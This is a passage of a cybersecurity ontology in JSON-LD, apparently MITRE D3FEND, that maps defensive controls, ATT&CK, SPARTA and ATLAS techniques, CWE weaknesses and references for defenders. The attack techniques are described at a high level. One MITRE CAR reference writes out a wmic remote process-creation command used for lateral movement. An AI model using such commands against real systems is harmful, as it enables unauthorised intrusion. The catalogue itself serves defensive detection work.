      "d3f:definition": "The information system, for biometric-based authentication, employs mechanisms that satisfy organization-defined biometric quality requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:BiometricAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002005"
    },
    {
      "@id": "d3f:DS0019",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in",
      "d3f:exactly": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Service Metadata component",
      "rdfs:label": "Service (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-001297_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system detects unauthorized changes to software and information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001297"
    },
    {
      "@id": "d3f:T1090.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.003",
      "d3f:definition": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Multi-hop Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:N62a175c92a714d0ebf90c0ea801faa17"
        }
      ]
    },
    {
      "@id": "_:N62a175c92a714d0ebf90c0ea801faa17",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ATTACKICSCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0101"
      },
      "rdfs:label": "Command and Control Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nc3689730a9c74926913151fe5b846ee0"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:Nc3689730a9c74926913151fe5b846ee0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0101"
      }
    },
    {
      "@id": "d3f:CCI-000768_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for local access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000768"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions | Transmit Access Authorization Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-24(1)"
    },
    {
      "@id": "d3f:AccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccessMediation"
      ],
      "d3f:d3fend-id": "D3-AMED",
      "d3f:definition": "Access mediation is the process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances). Access mediation decisions should enforce least privilege by granting access for scoped durations to prevent privilege creep and, where applicable, implement just-in-time (JIT) access. Denial decisions may prevent initial access or terminate access that has already been granted, ensuring continuous enforcement of security policies.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CNNSI-4009"
      },
      "d3f:synonym": "Access Control",
      "rdfs:label": "Access Mediation",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Access_control"
        },
        {
          "@id": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=1451869"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.201-2.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf"
        },
        {
          "@id": "https://www.cs.cmu.edu/afs/cs/usr/bsy/security/CSC-STD-001-83.txt"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Naa5d6480938f4cbd9ee12bb4261325b5"
        }
      ]
    },
    {
      "@id": "_:Naa5d6480938f4cbd9ee12bb4261325b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:T1491.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1491.002",
      "d3f:definition": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "External Defacement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1491"
        },
        {
          "@id": "_:N8ddd270281c74f43ac791eaaf94f2166"
        }
      ]
    },
    {
      "@id": "_:N8ddd270281c74f43ac791eaaf94f2166",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:contained-by",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x contained-by y: The entity x exists within or is physically or logically enclosed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:contains"
      },
      "rdfs:label": "contained-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-contained-by"
        }
      ]
    },
    {
      "@id": "d3f:T1634",
      "@type": "owl:Class",
      "d3f:attack-id": "T1634",
      "d3f:definition": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
      "rdfs:label": "Credentials from Password Store - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Credentials from Password Store"
    },
    {
      "@id": "d3f:CWE-787",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-787",
      "d3f:definition": "The product writes data past the end, or before the beginning, of the intended buffer.",
      "d3f:synonym": "Memory Corruption",
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Out-of-bounds Write",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nca5344a59ced4a6b9a9d1a3ae83f7118"
        }
      ]
    },
    {
      "@id": "_:Nca5344a59ced4a6b9a9d1a3ae83f7118",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:OTDeviceDescriptionMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Describe features, abilities, or performance of system components.",
      "rdfs:label": "OT Device Description Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:Nbd9be6b445804df4934060f956e9f44e"
        }
      ]
    },
    {
      "@id": "_:Nbd9be6b445804df4934060f956e9f44e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceDescriptionMessage"
      }
    },
    {
      "@id": "d3f:ATTACKMobileThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:T1011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1011",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Other Network Medium",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:Ne20b06e8abad463cae063b372628c296"
        }
      ]
    },
    {
      "@id": "_:Ne20b06e8abad463cae063b372628c296",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-625",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-625",
      "d3f:definition": "The product uses a regular expression that does not sufficiently restrict the set of allowed values.",
      "rdfs:label": "Permissive Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-185"
      }
    },
    {
      "@id": "d3f:TraceProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A trace system call provides a means by which one process (the \"tracer\") may observe and control the execution of another process (the \"tracee\"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.",
      "d3f:monitors": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Trace Process",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Ptrace"
        },
        {
          "@id": "https://linux.die.net/man/2/ptrace"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N766c5a9348194c2c80a4500d728420b0"
        }
      ],
      "skos:altLabel": "Open Process"
    },
    {
      "@id": "_:N766c5a9348194c2c80a4500d728420b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1193",
      "@type": "owl:Class",
      "d3f:attack-id": "T1193",
      "d3f:definition": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.001",
      "rdfs:label": "Spearphishing Attachment",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1055.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055.015",
      "d3f:definition": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "ListPlanting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1055"
      }
    },
    {
      "@id": "d3f:CWE-150",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-150",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Escape, Meta, or Control Sequences",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:REC-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002",
      "d3f:definition": "Threat actors compile a concise but highly actionable dossier of “who/what/where/when” attributes about the spacecraft and mission. Descriptors include identity elements (mission name, NORAD catalog number, COSPAR international designator, call signs), mission class and operator, country of registry, launch vehicle and date, orbit regime and typical ephemerides, and any publicly filed regulatory artifacts (e.g., ITU/FCC filings). They also harvest operational descriptors such as ground network affiliations, common pass windows by latitude band, and staffing patterns implied by press, social media, and schedules. Even when each item is benign, the aggregate picture enables precise timing (e.g., during beta-angle peaks, eclipse seasons, or planned maintenance), realistic social-engineering pretexts, and better targeting of ground or cloud resources that support the mission.",
      "rdfs:label": "Gather Spacecraft Descriptors - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Descriptors"
    },
    {
      "@id": "d3f:UserDataTransferAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserDataTransferAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ResourceAccess"
      },
      "d3f:d3fend-id": "D3-UDTA",
      "d3f:definition": "Analyzing the amount of data transferred by a user.",
      "d3f:kb-article": "## How it works\nUnusual data transfer activity may indicate unauthorized activity. Data transfers can be analyzed by collecting network traffic or application logs.\n\n## Considerations\n* There is a potential for false positives from anomalies that are not associated with unauthorized activity.\n* Attackers that move low and slow may not differentiate their data transfer behavior enough for an alert to trigger.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingThreatAndRiskAssessmentOfAsset-actorInteractions_VECTRANETWORKSInc"
        }
      ],
      "rdfs:label": "User Data Transfer Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N67415414a1234e49838a6fafd3c281de"
        }
      ]
    },
    {
      "@id": "_:N67415414a1234e49838a6fafd3c281de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-782",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-782",
      "d3f:definition": "The product implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL.",
      "rdfs:label": "Exposed IOCTL with Insufficient Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-749"
      }
    },
    {
      "@id": "d3f:may-be-associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-be-associated-with y: The subject x and object y may be associated in some way.",
      "rdfs:label": "may-be-associated-with",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13804981-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190188384A1"
      },
      "d3f:kb-abstract": "Described herein are systems, techniques, and computer program products for preventing execution, by a scripting engine, of harmful commands that may be introduced by computer malware or other mechanisms. The system identifies certain host processes that may attempt to utilize a hosted scripting engine. An unmanaged interface module is injected into an identified host process. The unmanaged interface module is configured to detect certain conditions indicating the likelihood that a scripting engine will be instantiated, and in response to inject a managed interface module into the host process. The managed interface module hooks into certain methods of the scripting engine to intercept commands before they are executed by the scripting engine. The managed and unmanaged interface components then communicate with a kernel-mode threat detection component to determine whether any commands should be blocked.",
      "d3f:kb-author": "Ion-Alexandru IONESCU; Satoshi Tanda",
      "d3f:kb-mitre-analysis": "The patent describes techniques that can be implemented to detect and block malicious commands and command scripts from being executed by scripting engines.\n\n### Script Execution Monitoring explanation\nThis patent describes software installed on the host system that hooks into methods of a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. For example regular expression checking may be used to identify commands having malicious patterns. Expression checking may be used for script files as well as interactively - typed commands.\n\n### File Content Signatures explanation\nThis patent includes File Content Signatures because in the case of a script file, a hash of the file is compared against hashes of known malicious script files to determine whether the script file is malicious.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:ScriptExecutionAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Detecting script-based malware",
      "rdfs:label": "Reference - Detecting script-based malware - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-420",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-420",
      "d3f:definition": "The product protects a primary channel, but it does not use the same level of protection for an alternate channel.",
      "rdfs:label": "Unprotected Alternate Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:T1529",
      "@type": "owl:Class",
      "d3f:attack-id": "T1529",
      "d3f:definition": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)",
      "rdfs:label": "System Shutdown/Reboot",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:TicketGrantingTicket",
      "@type": "owl:Class",
      "d3f:definition": "In some computer security systems, a Ticket Granting Ticket or Ticket to Get Tickets (TGT) is a small, encrypted identification file with a limited validity period. After authentication, this file is granted to a user for data traffic protection by the key distribution center (KDC) subsystem of authentication services such as Kerberos. The TGT file contains the session key, its expiration date, and the user's IP address, which protects the user from man-in-the-middle attacks. The TGT is used to obtain a service ticket from Ticket Granting Service (TGS). User is granted access to network services only after this service ticket is provided.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Ticket_Granting_Ticket"
      },
      "rdfs:label": "Ticket Granting Ticket",
      "rdfs:seeAlso": {
        "@id": "dbr:Charlie_and_the_Chocolate_Factory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      },
      "skos:altLabel": "Golden Ticket"
    },
    {
      "@id": "d3f:T1665",
      "@type": "owl:Class",
      "d3f:attack-id": "T1665",
      "d3f:definition": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.",
      "rdfs:label": "Hide Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1481",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
      "rdfs:label": "Web Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Web Service"
    },
    {
      "@id": "d3f:CWE-484",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-484",
      "d3f:definition": "The product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.",
      "rdfs:label": "Omitted Break Statement in Switch",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-670"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:CWE-764",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-764",
      "d3f:definition": "The product locks a critical resource more times than intended, leading to an unexpected state in the system.",
      "rdfs:label": "Multiple Locks of a Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-667"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1059.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.010",
      "d3f:definition": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)",
      "rdfs:label": "AutoHotKey & AutoIT",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-12-001/"
      },
      "d3f:kb-abstract": "Adversaries can use Windows Management Instrumentation (WMI) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by CAR-2014-11-007. After the WMI connection has been initialized, a process can be remotely launched using the command: wmic /node:\"<hostname>\" process call create \"<command line>\", which is detected via CAR-2016-03-002.\n\nThis leaves artifacts at both a network (RPC) and process (command line) level. When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the the remote machine.\n\nAfter RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.\n\nWhen the command line is executed, it has the parent process of C:\\windows\\system32\\wbem\\WmiPrvSE.exe. This analytic looks for these two events happening in sequence, so that the network connection and target process are output.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessLineageAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2014-12-001: Remotely Launched Executables via WMI",
      "rdfs:label": "Reference - CAR-2014-12-001: Remotely Launched Executables via WMI - MITRE"
    },
    {
      "@id": "d3f:AML.T0019",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0019",
      "d3f:definition": "Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location.\nThe poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset.\nThis data may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).",
      "rdfs:label": "Publish Poisoned Datasets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0019"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Poisoned Datasets"
    },
    {
      "@id": "d3f:FileSetAttributesEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's metadata attributes are modified, such as changing its timestamps, labels, or categorization within the system.",
      "rdfs:label": "File Set Attributes Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Na3fc2200148042d08a55d4073e9e7a3f"
        },
        {
          "@id": "_:N79c7fe0b42754a6c98faeffd8516f7d7"
        }
      ]
    },
    {
      "@id": "_:Na3fc2200148042d08a55d4073e9e7a3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N79c7fe0b42754a6c98faeffd8516f7d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:T1036.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.005",
      "d3f:definition": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.",
      "d3f:invokes": {
        "@id": "d3f:MoveFile"
      },
      "d3f:may-create": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Match Legitimate Resource Name or Location",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N011a7e46e73c448cbfdfe61d648f446b"
        },
        {
          "@id": "_:N15238600e7734abebfed69cd9bba560c"
        }
      ]
    },
    {
      "@id": "_:N011a7e46e73c448cbfdfe61d648f446b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MoveFile"
      }
    },
    {
      "@id": "_:N15238600e7734abebfed69cd9bba560c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-925",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-925",
      "d3f:definition": "The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source.",
      "d3f:synonym": "Intent Spoofing",
      "rdfs:label": "Improper Verification of Intent by Broadcast Receiver",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-940"
      }
    },
    {
      "@id": "d3f:CCI-000047_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system delays next login prompt according to the organization-defined delay algorithm, when the maximum number of unsuccessful attempts is exceeded, automatically locks the account/node for an organization-defined time period or locks the account/node until released by an Administrator IAW organizational policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000047"
    },
    {
      "@id": "d3f:T1547.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.005",
      "d3f:definition": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Security Support Provider",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nbb50c8c0612d4a8ea8038bfae55e9ef5"
        }
      ]
    },
    {
      "@id": "_:Nbb50c8c0612d4a8ea8038bfae55e9ef5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:SystemPlatformVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
